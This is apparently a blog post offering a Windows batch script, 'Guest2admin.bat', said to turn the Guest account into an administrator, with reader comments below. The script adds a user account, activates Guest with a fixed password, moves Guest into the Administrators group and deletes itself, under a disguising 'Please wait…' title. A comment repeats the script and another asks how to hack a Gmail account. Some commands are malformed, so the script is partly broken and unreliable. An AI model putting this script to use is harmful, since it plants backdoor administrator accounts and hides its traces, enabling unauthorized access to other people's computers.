Copy this to notepad
echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Save the file as “Guest2admin.bat”
then u can double click the file to execute or run in the cmd.
This turns your guest account into administrotor account…..
You may also like these Articles:
- Recover Administrators Password through Guest account without changing the password !
- How to reset Administrator Password in Windows Xp
- Get Windows 7 Theme on Windows XP
- Add google buzz button to your wordpress blog
- How to Import Facebook Contacts to Gmail OR Hotmail Live
- How to Delete Your Yahoo! Mail Account
{ 3 comments }
really great sites, thank you,
sir,
please tell me how to hack gmail id without any software and safely.
Turn Windows Xp Guest Account to Administrator Account
echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
i add new user account name sonu
then in this command file i changed guest to sonu everywhere sonu account turn to adminstrator but password protected i don’s know password
Comments on this entry are closed.